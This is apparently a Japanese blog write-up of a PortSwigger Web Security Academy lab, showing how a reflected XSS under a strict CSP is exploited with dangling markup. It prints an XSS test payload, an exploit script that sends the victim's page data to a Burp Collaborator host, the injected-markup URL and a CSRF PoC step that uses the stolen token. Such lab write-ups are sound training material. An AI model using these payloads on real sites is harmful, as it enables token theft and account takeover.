shikata ga nai

Private? There is no such things.

Reflected XSS protected by very strict CSP, with dangling markup attackをやってみた

Hello there, ('ω')ノ

 

ぶら下がりマークアップ攻撃で非常に厳格なCSPで保護された反射型XSSを。

このラボでは、外部Webサイトへの送信要求をブロックする厳密なCSPを使用して。

ラボを解決するにはクロスサイトスクリプティングでCSPをバイパスして。

BurpCollaboratorを使用してCSRFトークンを盗み出して。 

 

まずは、ログインして。

 

f:id:ThisIsOne:20210512093241p:plain

 

電子メールの変更機能をの脆弱性を確認して。

 

f:id:ThisIsOne:20210512093427p:plain

 

メールアドレスを変更して。

 

f:id:ThisIsOne:20210512093506p:plain

 

リクエストをリピータへ。

 

f:id:ThisIsOne:20210512094232p:plain

 

リクエストからもペイロードを試してレスポンス内容を確認して。

 email="><img%20src=%20onerror=alert(1)>

 

f:id:ThisIsOne:20210512094437p:plain

 

コラボレータでペイロードをコピーして。

 

f:id:ThisIsOne:20210512093601p:plain

 

エクスプロイトサーバで下記のスクリプトを挿入して。

 

<script>
if(window.name) {
new Image().src='//tpmk842hfb966giifammbomdr4xulj.burpcollaborator.net?'+encodeURIComponent(window.name);
} else {
location = 'https://ac101f1b1eeeaf7d802dc061007700d4.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://ac0d1f4a1e42af4a8047c04b01b500b9.web-security-academy.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27';
}
</script>

 

%22%3E%3Ca%20

"><a

 

%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27

">Click me</a><base target='

 

f:id:ThisIsOne:20210512093752p:plain

 

Storeして、Viewでページを確認してからDeliverして。

ユーザがこのサイトにアクセスしてリンクをクリックすると。

CSRFトークンを悪意のあるWebサイトに送信して。

 

https://ac101f1b1eeeaf7d802dc061007700d4.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://ac0d1f4a1e42af4a8047c04b01b500b9.web-security-academy.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27

 

f:id:ThisIsOne:20210512093851p:plain

 

次にコラボレータのHTTPインタラクションをデコードして。

 

f:id:ThisIsOne:20210512095410p:plain

 

CSRFトークンを取得して。

 value="ay0MXxt7xVnVKlJJXrKIT4RSQFs0qibR"

f:id:ThisIsOne:20210512095449p:plain

 

再度、電子メールをの変更を。

 

f:id:ThisIsOne:20210512095633p:plain

 

リクエストをインターセプトしてCSEF PoCへ。

 

f:id:ThisIsOne:20210512095654p:plain

 

オプションで自動送信スクリプトをチェックして。

メールアドレスと被害者から盗んだCSRFトークンを変更して。

Regenerateして、HTMLをコピーして。

 

f:id:ThisIsOne:20210512095749p:plain

 

インターセプトをオフにして。

エクスプロイトサーバに挿入して、Storeして。

 

f:id:ThisIsOne:20210512095900p:plain

 

Viewでエクスプロイトを確認してからDeliverすると。

 

f:id:ThisIsOne:20210512095940p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210512100108p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain